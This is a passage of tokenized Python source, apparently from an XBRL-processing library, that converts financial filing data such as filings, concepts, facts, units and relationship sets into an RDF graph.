open ( TRACERDFFILE , "<STR_LIT:a>" , encoding = '<STR_LIT:utf-8>' ) as fh : <EOL> fh . write ( "<STR_LIT>" . format ( str ( results ) ) ) <EOL> if isinstance ( results , str ) and query is not None : <EOL> parser = etree . HTMLParser ( ) <EOL> htmlDoc = etree . parse ( io . StringIO ( results ) , parser ) <EOL> body = htmlDoc . find ( "<STR_LIT>" ) <EOL> if body is not None : <EOL> error = "<STR_LIT>" . join ( text for text in body . itertext ( ) ) <EOL> else : <EOL> error = results <EOL> raise XRDBException ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> activity = activity , error = error ) <EOL> return results <EOL> def commit ( self , graph ) : <EOL> self . execute ( "<STR_LIT>" , graph = graph ) <EOL> def loadGraphRootVertices ( self ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> pass <EOL> def getDBsize ( self ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> def insertXbrl ( self , rssItem ) : <EOL> try : <EOL> from arelle import ValidateXbrlDimensions <EOL> ValidateXbrlDimensions . loadDimensionDefaults ( self . modelXbrl ) <EOL> startedAt = time . time ( ) <EOL> self . identifyPreexistingDocuments ( ) <EOL> g = self . initializeGraph ( ) <EOL> self . insertSchema ( g ) <EOL> self . insertFiling ( rssItem , g ) <EOL> self . insertDocuments ( g ) <EOL> self . insertDataDictionary ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> startedAt = time . time ( ) <EOL> self . insertDataPoints ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> startedAt = time . time ( ) <EOL> self . insertRelationshipSets ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . insertValidationResults ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> self . commit ( g ) <EOL> self . modelXbrl . 
profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . showStatus ( "<STR_LIT>" , clearAfter = <NUM_LIT> ) <EOL> except Exception as ex : <EOL> self . showStatus ( "<STR_LIT>" , clearAfter = <NUM_LIT> ) <EOL> raise <EOL> def insertSchema ( self , g ) : <EOL> if True : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> g . add ( ( XML . QName , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XBRL . Filing , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XML . Document , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XBRL . Schema , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . Linkbase , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . Instance , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . InlineHtml , RDFS . subClassOf , XML . Document ) ) <EOL> def insertFiling ( self , rssItem , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> new_filing = { } <EOL> if self . modelXbrl . modelDocument . creationSoftwareComment : <EOL> new_filing [ '<STR_LIT>' ] = self . modelXbrl . modelDocument . creationSoftwareComment <EOL> datetimeNow = datetime . datetime . now ( ) <EOL> datetimeNowStr = XmlUtil . dateunionValue ( datetimeNow ) <EOL> entryUri = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> if rssItem is not None : <EOL> filingType = "<STR_LIT>" <EOL> new_filing [ '<STR_LIT>' ] = filingNumber = rssItem . accessionNumber <EOL> new_filing [ '<STR_LIT>' ] = XmlUtil . dateunionValue ( rssItem . acceptanceDatetime ) <EOL> new_filing [ '<STR_LIT>' ] = XmlUtil . dateunionValue ( rssItem . filingDate ) <EOL> new_filing [ '<STR_LIT>' ] = rssItem . cikNumber <EOL> new_filing [ '<STR_LIT>' ] = rssItem . companyName <EOL> new_filing [ '<STR_LIT>' ] = rssItem . assignedSic <EOL> new_filing [ '<STR_LIT>' ] = rssItem . htmlUrl <EOL> new_filing [ '<STR_LIT>' ] = URIRef ( rssItem . url ) <EOL> self . filingDTS = rssItem . htmlUrl <EOL> self . filingURI = URIRef ( self . 
filingDTS ) <EOL> else : <EOL> intNow = int ( time . time ( ) ) <EOL> new_filing [ '<STR_LIT>' ] = filingNumber = str ( intNow ) <EOL> self . filingId = int ( time . time ( ) ) <EOL> filingType = "<STR_LIT>" <EOL> new_filing [ '<STR_LIT>' ] = datetimeNowStr <EOL> new_filing [ '<STR_LIT>' ] = datetimeNowStr <EOL> new_filing [ '<STR_LIT>' ] = URIRef ( UrlUtil . ensureUrl ( self . modelXbrl . fileSource . url ) ) <EOL> self . filingDTS = Filing [ filingNumber ] <EOL> self . filingURI = URIRef ( self . filingDTS ) <EOL> g . add ( ( self . filingURI , RDF . type , XBRL . Filing ) ) <EOL> for n , v in new_filing . items ( ) : <EOL> g . add ( ( self . filingURI , Filing [ n ] , L ( v ) ) ) <EOL> self . reportURI = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> g . add ( ( self . reportURI , RDF . type , XBRL . Report ) ) <EOL> g . add ( ( self . filingURI , Filing . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , Filing . filing , self . filingURI ) ) <EOL> self . relationshipSets = [ ( arcrole , ELR , linkqname , arcqname ) <EOL> for arcrole , ELR , linkqname , arcqname in self . modelXbrl . baseSets . keys ( ) <EOL> if ELR and ( arcrole . startswith ( "<STR_LIT>" ) or ( linkqname and arcqname ) ) ] <EOL> def identifyPreexistingDocuments ( self ) : <EOL> self . existingDocumentUris = set ( ) <EOL> if not ( self . isRdfTurtleFile or self . isRdfXmlFile ) : <EOL> docFilters = [ ] <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> if modelDocument . type == Type . SCHEMA : <EOL> docFilters . append ( '<STR_LIT>' . format ( UrlUtil . ensureUrl ( modelDocument . uri ) ) ) <EOL> results = self . execute ( <EOL> "<STR_LIT>" , <EOL> query = """<STR_LIT>""" + '<STR_LIT>' . join ( docFilters ) + "<STR_LIT>" ) <EOL> try : <EOL> for result in results [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> doc = result [ '<STR_LIT>' ] <EOL> if doc . get ( '<STR_LIT:type>' ) == '<STR_LIT>' : <EOL> self . existingDocumentUris . 
add ( doc [ '<STR_LIT:value>' ] ) <EOL> except KeyError : <EOL> pass <EOL> def insertDocuments ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> documents = [ ] <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> docUri = URIRef ( modelObjectDocumentUri ( modelDocument ) ) <EOL> if UrlUtil . ensureUrl ( modelDocument . uri ) not in self . existingDocumentUris : <EOL> g . add ( ( docUri , RDF . type , XBRL . Document ) ) <EOL> g . add ( ( docUri , XBRL . url , docUri ) ) <EOL> g . add ( ( docUri , XBRL . documentType , DocumentTypes . get ( modelDocument . type , <EOL> DocumentTypes . get ( Type . UnknownXML ) ) ) ) <EOL> for doc , ref in modelDocument . referencesDocument . items ( ) : <EOL> if doc . inDTS and ref . referenceType in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> g . add ( ( docUri , XBRL . references , URIRef ( modelObjectDocumentUri ( doc ) ) ) ) <EOL> g . add ( ( self . filingURI , Filing . document , docUri ) ) <EOL> if modelDocument . uri == self . modelXbrl . modelDocument . uri : <EOL> g . add ( ( self . reportURI , DTS . EntryPoint , docUri ) ) <EOL> def conceptsUsed ( self ) : <EOL> conceptsUsed = set ( f . qname for f in self . modelXbrl . factsInInstance ) <EOL> for cntx in self . modelXbrl . contexts . values ( ) : <EOL> for dim in cntx . qnameDims . values ( ) : <EOL> conceptsUsed . add ( dim . dimensionQname ) <EOL> if dim . isExplicit : <EOL> conceptsUsed . add ( dim . memberQname ) <EOL> else : <EOL> conceptsUsed . add ( dim . typedMember . qname ) <EOL> for defaultDim , defaultDimMember in self . modelXbrl . qnameDimensionDefaults . items ( ) : <EOL> conceptsUsed . add ( defaultDim ) <EOL> conceptsUsed . add ( defaultDimMember ) <EOL> for roleTypes in ( self . modelXbrl . roleTypes , self . modelXbrl . arcroleTypes ) : <EOL> for modelRoleTypes in roleTypes . values ( ) : <EOL> for modelRoleType in modelRoleTypes : <EOL> for qn in modelRoleType . usedOns : <EOL> conceptsUsed . 
add ( qn ) <EOL> for relationshipSetKey in self . relationshipSets : <EOL> relationshipSet = self . modelXbrl . relationshipSet ( * relationshipSetKey ) <EOL> for rel in relationshipSet . modelRelationships : <EOL> if isinstance ( rel . fromModelObject , ModelConcept ) : <EOL> conceptsUsed . add ( rel . fromModelObject ) <EOL> if isinstance ( rel . toModelObject , ModelConcept ) : <EOL> conceptsUsed . add ( rel . toModelObject ) <EOL> for qn in ( XbrlConst . qnXbrliIdentifier , XbrlConst . qnXbrliPeriod , XbrlConst . qnXbrliUnit ) : <EOL> conceptsUsed . add ( qn ) <EOL> conceptsUsed -= { None } <EOL> return conceptsUsed <EOL> def insertDataDictionary ( self , g ) : <EOL> self . type_id = { } <EOL> self . aspect_id = { } <EOL> self . aspect_proxy_uri = { } <EOL> self . roleType_id = { } <EOL> self . arcroleType_id = { } <EOL> '''<STR_LIT>''' <EOL> conceptsUsed = self . conceptsUsed ( ) <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> self . showStatus ( "<STR_LIT>" + modelDocument . basename ) <EOL> if modelDocument . type == Type . SCHEMA : <EOL> isNewDocument = True <EOL> modelConcepts = [ modelConcept <EOL> for modelConcept in self . modelXbrl . qnameConcepts . values ( ) <EOL> if modelConcept . modelDocument is modelDocument and <EOL> ( isNewDocument or modelConcept in conceptsUsed ) ] <EOL> if UrlUtil . ensureUrl ( modelDocument . uri ) not in self . existingDocumentUris : <EOL> for modelType in self . modelXbrl . qnameTypes . values ( ) : <EOL> if modelType . modelDocument is modelDocument : <EOL> typeUri = modelObjectUri ( modelType ) <EOL> typeQnameUri = qnameUri ( modelType ) <EOL> docUri = modelObjectDocumentUri ( modelType ) <EOL> g . add ( ( docUri , XBRL . dataType , typeUri ) ) <EOL> g . add ( ( typeUri , XBRL . document , docUri ) ) <EOL> g . add ( ( typeUri , RDF . type , XBRL . DataType ) ) <EOL> g . add ( ( typeUri , RDF . type , XBRL . QName ) ) <EOL> g . add ( ( typeUri , QName . namespace , L ( modelDocument . 
targetNamespace ) ) ) <EOL> g . add ( ( typeUri , QName . localName , L ( modelType . name ) ) ) <EOL> xbrliBaseType = modelType . baseXbrliTypeQname <EOL> if not isinstance ( xbrliBaseType , ( tuple , list ) ) : <EOL> xbrliBaseType = ( xbrliBaseType , ) <EOL> for baseType in xbrliBaseType : <EOL> if baseType is not None : <EOL> baseTypeUri = qnameUri ( baseType ) <EOL> g . add ( ( typeUri , <EOL> AspectType . baseXbrliType , <EOL> baseTypeUri ) ) <EOL> if baseType . namespaceURI == "<STR_LIT>" : <EOL> g . add ( ( typeUri , AspectType . baseXsdType , baseTypeUri ) ) <EOL> typeDerivedFrom = modelType . typeDerivedFrom <EOL> if not isinstance ( typeDerivedFrom , ( tuple , list ) ) : <EOL> typeDerivedFrom = ( typeDerivedFrom , ) <EOL> for dt in typeDerivedFrom : <EOL> if dt is not None : <EOL> dtUri = modelObjectUri ( dt ) <EOL> g . add ( ( typeUri , AspectType . derivedFrom , dtUri ) ) <EOL> for prop in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> propertyValue = getattr ( modelType , prop , None ) <EOL> if propertyValue : <EOL> g . add ( ( typeUri , AspectType [ prop ] , L ( propertyValue ) ) ) <EOL> conceptAspects = [ ] <EOL> for modelConcept in modelConcepts : <EOL> conceptUri = modelObjectUri ( modelConcept ) <EOL> conceptQnameUri = modelObjectQnameUri ( modelConcept ) <EOL> docUri = modelObjectDocumentUri ( modelConcept ) <EOL> g . add ( ( docUri , XBRL . aspect , conceptUri ) ) <EOL> g . add ( ( conceptUri , XBRL . document , docUri ) ) <EOL> g . add ( ( conceptUri , RDF . type , XBRL . Aspect ) ) <EOL> g . add ( ( conceptUri , RDF . type , XBRL . QName ) ) <EOL> g . add ( ( conceptUri , QName . namespace , L ( modelConcept . qname . namespaceURI ) ) ) <EOL> g . add ( ( conceptUri , QName . localName , L ( modelConcept . qname . localName ) ) ) <EOL> g . add ( ( conceptUri , Aspect . isAbstract , L ( modelConcept . isAbstract ) ) ) <EOL> if modelConcept . periodType : <EOL> g . add ( ( conceptUri , Aspect . periodType , L ( modelConcept . 
periodType ) ) ) <EOL> if modelConcept . balance : <EOL> g . add ( ( conceptUri , Aspect . balance , L ( modelConcept . balance ) ) ) <EOL> for prop in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> propertyValue = getattr ( modelConcept , prop , None ) <EOL> if propertyValue : <EOL> g . add ( ( conceptUri , Aspect [ prop ] , L ( propertyValue ) ) ) <EOL> conceptType = modelConcept . type <EOL> if conceptType is not None : <EOL> typeUri = modelObjectUri ( conceptType ) <EOL> g . add ( ( conceptUri , XBRL . dataType , typeUri ) ) <EOL> substitutionGroup = modelConcept . substitutionGroup <EOL> if substitutionGroup is not None : <EOL> sgUri = modelObjectUri ( substitutionGroup ) <EOL> g . add ( ( conceptUri , XBRL . substitutionGroup , sgUri ) ) <EOL> for modelRoleTypes in self . modelXbrl . roleTypes . values ( ) : <EOL> for modelRoleType in modelRoleTypes : <EOL> rtUri = modelObjectUri ( modelRoleType ) <EOL> docUri = modelObjectDocumentUri ( modelRoleType ) <EOL> g . add ( ( docUri , XBRL . roleType , rtUri ) ) <EOL> g . add ( ( rtUri , XBRL . document , docUri ) ) <EOL> g . add ( ( rtUri , RDF . type , DTS . RoleType ) ) <EOL> g . add ( ( rtUri , RoleType . roleUri , URIRef ( modelRoleType . roleURI ) ) ) <EOL> g . add ( ( rtUri , RoleType . definition , L ( modelRoleType . definition ) ) ) <EOL> for qn in modelRoleType . usedOns : <EOL> usedOnConcept = self . modelXbrl . qnameConcepts [ qn ] <EOL> g . add ( ( rtUri , RoleType . usedOn , modelObjectUri ( usedOnConcept ) ) ) <EOL> for modelArcroleTypes in self . modelXbrl . arcroleTypes . values ( ) : <EOL> for modelArcroleType in modelArcroleTypes : <EOL> rt_uri = modelObjectUri ( modelArcroleType ) <EOL> doc_uri = modelObjectDocumentUri ( modelArcroleType ) <EOL> g . add ( ( doc_uri , XBRL . arcroleType , rt_uri ) ) <EOL> g . 
add ( ( rtUri , XBRL . document , docUri ) ) <EOL> g . add ( ( rt_uri , RDF . type , DTS . ArcRoleType ) ) <EOL> g . add ( ( rt_uri , ArcRoleType . roleUri , URIRef ( modelArcroleType . arcroleURI ) ) ) <EOL> g . add ( ( rt_uri , ArcRoleType . definition , L ( modelArcroleType . definition ) ) ) <EOL> g . add ( ( rt_uri , ArcRoleType . cyclesAllowed , ArcRoleCycles [ modelArcroleType . cyclesAllowed ] ) ) <EOL> for qn in modelArcroleType . usedOns : <EOL> usedOnConcept = self . modelXbrl . qnameConcepts [ qn ] <EOL> g . add ( ( rt_uri , ArcRoleType . usedOn , modelObjectUri ( usedOnConcept ) ) ) <EOL> activity = "<STR_LIT>" + modelDocument . uri <EOL> '''<STR_LIT>''' <EOL> def insertAspectProxies ( self , qnames , g ) : <EOL> aspectQnames = [ qname <EOL> for qname in qnames <EOL> if qname not in self . aspect_proxy_uri and qname in self . modelXbrl . qnameConcepts ] <EOL> for qname in aspectQnames : <EOL> self . insertAspectProxy ( qname , <EOL> URIRef ( "<STR_LIT>" . format ( self . reportURI , qnamePrefix_Name ( qname ) ) ) , <EOL> g ) <EOL> def insertAspectProxy ( self , aspectQName , aspectProxyUri , g ) : <EOL> concept = self . modelXbrl . qnameConcepts [ aspectQName ] <EOL> g . add ( ( aspectProxyUri , RDF . type , DTS . AspectProxy ) ) <EOL> g . add ( ( aspectProxyUri , DTS . aspect , modelObjectUri ( concept ) ) ) <EOL> g . add ( ( aspectProxyUri , DTS . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , DTS . aspectProxy , aspectProxyUri ) ) <EOL> self . aspect_proxy_uri [ aspectQName ] = aspectProxyUri <EOL> def aspectQnameProxyURI ( self , qname ) : <EOL> if hasattr ( qname , "<STR_LIT>" ) : <EOL> return self . aspect_proxy_uri . get ( qname . qname ) <EOL> elif qname in self . modelXbrl . qnameConcepts : <EOL> return self . aspect_proxy_uri . get ( qname ) <EOL> return None <EOL> def insertDataPoints ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> dimensions = [ ] <EOL> dimensionIds = { } <EOL> if self . modelXbrl . 
modelDocument . type in ( Type . INSTANCE , Type . INLINEXBRL ) : <EOL> contextAspectValueSelections = { } <EOL> unitIDs = set ( ) <EOL> periodURIs = { } <EOL> entityIdentifierURIs = { } <EOL> for fact in self . modelXbrl . factsInInstance : <EOL> factUri = modelObjectUri ( fact ) <EOL> docUri = modelObjectDocumentUri ( fact ) <EOL> baseXsdType = fact . concept . baseXsdType if fact . concept is not None else None <EOL> g . add ( ( factUri , RDF . type , XBRL . DataPoint ) ) <EOL> g . add ( ( docUri , XBRL . dataPoint , factUri ) ) <EOL> g . add ( ( factUri , XBRL . document , docUri ) ) <EOL> self . insertAspectProxies ( ( fact . qname , ) , g ) <EOL> g . add ( ( factUri , XBRL . baseItem , self . aspectQnameProxyURI ( fact . qname ) ) ) <EOL> g . add ( ( factUri , XML . id , L ( XmlUtil . elementFragmentIdentifier ( fact ) ) ) ) <EOL> g . add ( ( factUri , XML . sourceLine , L ( fact . sourceline ) ) ) <EOL> context = fact . context <EOL> concept = fact . concept <EOL> if context is not None : <EOL> if context . entityIdentifier not in entityIdentifierURIs : <EOL> entityScheme , entityIdentifier = context . entityIdentifier <EOL> entityIdentifierUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> qnamePrefix_Name ( XbrlConst . qnXbrliIdentifier ) , <EOL> entityIdentifier ) ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliIdentifier , entityIdentifierUri , g ) <EOL> g . add ( ( entityIdentifierUri , RDF . type , DTS . EntityIdentifier ) ) <EOL> g . add ( ( entityIdentifierUri , XBRLI . scheme , L ( entityScheme ) ) ) <EOL> g . add ( ( entityIdentifierUri , XBRLI . identifier , L ( entityIdentifier ) ) ) <EOL> entityIdentifierURIs [ context . entityIdentifier ] = entityIdentifierUri <EOL> else : <EOL> entityIdentifierUri = entityIdentifierURIs [ context . entityIdentifier ] <EOL> g . add ( ( factUri , XBRLI . EntityIdentifier , entityIdentifierUri ) ) <EOL> if context . isForeverPeriod : <EOL> period = "<STR_LIT>" <EOL> if context . 
isInstantPeriod : <EOL> endDate = XmlUtil . dateunionValue ( context . instantDatetime , subtractOneDay = True ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> period = "<STR_LIT>" . format ( endDate ) <EOL> else : <EOL> startDate = XmlUtil . dateunionValue ( context . startDatetime ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> endDate = XmlUtil . dateunionValue ( context . endDatetime , subtractOneDay = True ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> period = "<STR_LIT>" . format ( startDate , endDate ) <EOL> if period not in periodURIs : <EOL> periodUri = URIRef ( "<STR_LIT>" . format ( self . reportURI , period ) ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliPeriod , periodUri , g ) <EOL> g . add ( ( periodUri , RDF . type , DTS . Period ) ) <EOL> g . add ( ( periodUri , XBRL . isForever , L ( context . isForeverPeriod ) ) ) <EOL> g . add ( ( periodUri , XBRL . isInstant , L ( context . isInstantPeriod ) ) ) <EOL> if context . isStartEndPeriod : <EOL> d = context . startDatetime <EOL> if d . hour == <NUM_LIT:0> and d . minute == <NUM_LIT:0> and d . second == <NUM_LIT:0> : <EOL> d = d . date ( ) <EOL> g . add ( ( periodUri , XBRLI . startDate , L ( d ) ) ) <EOL> if context . isStartEndPeriod or context . isInstantPeriod : <EOL> d = context . endDatetime <EOL> if d . hour == <NUM_LIT:0> and d . minute == <NUM_LIT:0> and d . second == <NUM_LIT:0> : <EOL> d = ( d - datetime . timedelta ( <NUM_LIT:1> ) ) . date ( ) <EOL> g . add ( ( periodUri , XBRLI . endDate , L ( d ) ) ) <EOL> periodURIs [ period ] = periodUri <EOL> else : <EOL> periodUri = periodURIs [ period ] <EOL> g . add ( ( factUri , XBRLI . Period , periodUri ) ) <EOL> contextUri = modelObjectUri ( context ) <EOL> g . add ( ( factUri , XBRLI . contextId , L ( context . id ) ) ) <EOL> if context . id not in contextAspectValueSelections : <EOL> contextAspectValueSelection = [ ] <EOL> contextAspectValueSelections [ context . 
id ] = contextAspectValueSelection <EOL> for dimVal in context . qnameDims . values ( ) : <EOL> dimUri = modelObjectUri ( dimVal ) <EOL> self . insertAspectProxy ( dimVal . dimensionQname , dimUri , g ) <EOL> g . add ( ( dimUri , RDF . type , DTS . AspectValueSelection ) ) <EOL> contextAspectValueSelection . append ( dimUri ) <EOL> if dimVal . isExplicit : <EOL> self . insertAspectProxies ( ( dimVal . memberQname , ) , g ) <EOL> g . add ( ( dimUri , XBRLI . AspectValue , self . aspectQnameProxyURI ( dimVal . memberQname ) ) ) <EOL> else : <EOL> g . add ( ( dimUri , DTS . typedValue , L ( dimVal . typedMember . stringValue ) ) ) <EOL> else : <EOL> contextAspectValueSelection = contextAspectValueSelections [ context . id ] <EOL> for aspectValueSelectionUri in contextAspectValueSelection : <EOL> g . add ( ( factUri , XBRLI . aspectValueSelection , aspectValueSelectionUri ) ) <EOL> if fact . isNumeric : <EOL> if fact . precision == "<STR_LIT>" : <EOL> g . add ( ( factUri , XBRLI . precision , L ( "<STR_LIT>" ) ) ) <EOL> elif fact . precision is not None : <EOL> g . add ( ( factUri , XBRLI . precision , L ( fact . precision , datatype = XSD . integer ) ) ) <EOL> if fact . decimals == "<STR_LIT>" : <EOL> g . add ( ( factUri , XBRLI . decimals , L ( "<STR_LIT>" ) ) ) <EOL> elif fact . decimals is not None : <EOL> g . add ( ( factUri , XBRLI . decimals , L ( fact . decimals , datatype = XSD . integer ) ) ) <EOL> if fact . unit is not None : <EOL> unit = fact . unit <EOL> unitUri = modelObjectUri ( unit ) <EOL> g . add ( ( factUri , XBRLI . unit , unitUri ) ) <EOL> g . add ( ( factUri , XBRLI . unitId , L ( unit . id ) ) ) <EOL> if unit . id not in unitIDs : <EOL> unitIDs . add ( unit . id ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliUnit , unitUri , g ) <EOL> g . add ( ( unitUri , RDF . type , DTS . Unit ) ) <EOL> g . add ( ( docUri , XBRL . defines , unitUri ) ) <EOL> mults , divs = unit . measures <EOL> for qn in mults : <EOL> qnUri = qnameUri ( qn ) <EOL> g . 
add ( ( unitUri , Unit . multiply , qnUri ) ) <EOL> g . add ( ( qnUri , RDF . type , XBRL . Measure ) ) <EOL> for qn in divs : <EOL> qnUri = qnameUri ( qn ) <EOL> g . add ( ( unitUri , Unit . divide , qnUri ) ) <EOL> g . add ( ( qnUri , RDF . type , XBRL . Measure ) ) <EOL> if fact . xmlLang is None and fact . concept is not None and fact . concept . baseXsdType is not None : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . xValue , datatype = XSD [ concept . baseXsdType ] ) ) ) <EOL> elif fact . xmlLang is not None : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . value , lang = fact . xmlLang ) ) ) <EOL> else : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . value ) ) ) <EOL> if fact . modelTupleFacts : <EOL> g . add ( ( factUri , RDF . type , XBRL . tuple ) ) <EOL> for tupleFact in fact . modelTupleFacts : <EOL> g . add ( ( factUri , XBRLI . tuple , modelObjectUri ( tupleFact ) ) ) <EOL> if self . modelXbrl . modelDocument . type in ( Type . INSTANCE , Type . INLINEXBRL ) : <EOL> for fact in self . modelXbrl . factsInInstance : <EOL> factUri = modelObjectUri ( fact ) <EOL> def insertRelationshipSets ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> entryUrl = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> aspectQnamesUsed = set ( ) <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if linkqname : <EOL> aspectQnamesUsed . add ( linkqname ) <EOL> if arcqname : <EOL> aspectQnamesUsed . add ( arcqname ) <EOL> self . insertAspectProxies ( aspectQnamesUsed , g ) <EOL> relSetURIs = { } <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if arcrole not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) and linkrole and linkqname and arcqname : <EOL> relSetUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . 
filingURI , <EOL> os . path . basename ( arcrole ) , <EOL> os . path . basename ( linkrole ) ) ) <EOL> relSetURIs [ relationshipSetKey ] = relSetUri <EOL> g . add ( ( relSetUri , RDF . type , XBRL . RelationshipSet ) ) <EOL> g . add ( ( relSetUri , XBRL . arcrole , L ( arcrole ) ) ) <EOL> g . add ( ( relSetUri , XBRL . linkrole , L ( linkrole ) ) ) <EOL> g . add ( ( relSetUri , XBRL . arcname , self . aspectQnameProxyURI ( arcqname ) ) ) <EOL> g . add ( ( relSetUri , XBRL . linkname , self . aspectQnameProxyURI ( linkqname ) ) ) <EOL> g . add ( ( self . reportURI , XBRL . relationshipSet , relSetUri ) ) <EOL> g . add ( ( relSetUri , XBRL . report , self . reportURI ) ) <EOL> relE = [ ] <EOL> resources = set ( ) <EOL> aspectQnamesUsed = set ( ) <EOL> def walkTree ( rels , parentRelUri , seq , depth , relationshipSetKey , relationshipSet , visited , relSetUri , doVertices ) : <EOL> for rel in rels : <EOL> if rel not in visited : <EOL> visited . add ( rel ) <EOL> if not doVertices : <EOL> _relProp = { '<STR_LIT>' : L ( seq ) , <EOL> '<STR_LIT>' : L ( depth ) , <EOL> '<STR_LIT>' : L ( rel . orderDecimal ) , <EOL> '<STR_LIT>' : L ( rel . priority ) , <EOL> '<STR_LIT>' : relSetUri <EOL> } <EOL> if isinstance ( rel . fromModelObject , ModelConcept ) : <EOL> if doVertices : <EOL> aspectQnamesUsed . add ( rel . fromModelObject . qname ) <EOL> sourceUri = True <EOL> else : <EOL> sourceUri = self . aspectQnameProxyURI ( rel . fromModelObject . qname ) <EOL> sourceId = qnamePrefix_Name ( rel . fromModelObject . qname ) <EOL> else : <EOL> sourceUri = None <EOL> toModelObject = rel . toModelObject <EOL> if isinstance ( toModelObject , ModelConcept ) : <EOL> if doVertices : <EOL> aspectQnamesUsed . add ( toModelObject . qname ) <EOL> targetUri = True <EOL> else : <EOL> targetUri = self . aspectQnameProxyURI ( toModelObject . qname ) <EOL> targetId = qnamePrefix_Name ( toModelObject . 
qname ) <EOL> elif isinstance ( toModelObject , ModelResource ) : <EOL> if doVertices : <EOL> resources . add ( toModelObject ) <EOL> targetUri = <NUM_LIT:0> <EOL> else : <EOL> if rel . preferredLabel : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . preferredLabel ) <EOL> if rel . arcrole in ( XbrlConst . all , XbrlConst . notAll ) : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . closed ) <EOL> elif rel . arcrole in ( XbrlConst . dimensionDomain , XbrlConst . domainMember ) : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . usable ) <EOL> elif rel . arcrole == XbrlConst . summationItem : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . weightDecimal ) <EOL> if relationshipSet . arcrole == "<STR_LIT>" : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . arcrole ) <EOL> if toModelObject . role : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( toModelObject . role ) <EOL> targetUri = modelObjectUri ( toModelObject ) <EOL> targetId = toModelObject . modelDocument . basename + '<STR_LIT:#>' + XmlUtil . elementFragmentIdentifier ( toModelObject ) <EOL> else : <EOL> targetUri = None <EOL> if sourceUri is not None and targetUri is not None : <EOL> targetRelSetUri = relSetUri <EOL> targetRelSetKey = relationshipSetKey <EOL> if relationshipSet . arcrole == "<STR_LIT>" and rel . targetRole : <EOL> targetRelSet = self . modelXbrl . relationshipSet ( relationshipSet . arcrole , rel . targetRole ) <EOL> for i , relSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , ELR , linkqname , arcqname = relSetKey <EOL> if arcrole == "<STR_LIT>" and ELR == rel . targetRole : <EOL> targetRelationshipSetUri = relSetURIs [ relSetKey ] <EOL> targetRelSetKey = relSetKey <EOL> break <EOL> if not doVertices : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . 
